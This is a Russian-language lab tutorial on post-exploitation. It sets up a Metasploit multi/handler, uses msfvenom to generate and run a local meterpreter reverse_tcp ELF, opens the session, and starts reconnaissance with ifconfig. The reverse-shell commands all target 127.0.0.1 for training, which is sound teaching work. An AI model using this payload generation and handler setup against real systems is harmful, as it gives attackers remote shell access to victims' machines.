Определение службы во внутренней сети цели
На этом этапе мы симулируем получение сессии Meterpreter на целевой машине. В реальном сценарии это достигается путем эксплуатации уязвимости. Для этой лабораторной работы мы настроим прослушиватель (listener) в Metasploit и вручную выполним пейлоад для подключения к нему. Это позволит нам сосредоточиться на фазе пост-эксплуатации.
Сначала нам нужно установить Metasploit Framework.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Далее откройте терминал и запустите консоль Metasploit.
msfconsole -q
В msfconsole мы настроим обработчик (handler) для прослушивания входящих соединений.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Теперь откройте новый терминал (вы можете использовать кнопку "+" на вкладке терминала). В этом новом терминале мы сгенерируем и запустим пейлоад для обратного подключения к нашему прослушивателю.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
Вернитесь к вашему первому терминалу с msfconsole. Вы должны увидеть сообщение, указывающее на открытие новой сессии. Давайте взаимодействуем с ней.
sessions -l
sessions -i 1
Теперь вы находитесь в сессии Meterpreter. Обычным первым шагом является проведение разведки. Давайте проверим сетевые интерфейсы "скомпрометированного" хоста.
ifconfig
Вы увидите несколько сетевых интерфейсов. Для этой лабораторной работы мы будем считать, что посредством дальнейшего сканирования (которое выходит за рамки данной лабораторной работы) мы обнаружили веб-сервис, работающий на 127.0.0.1 на порту 8080. Наша цель — получить доступ к этому сервису.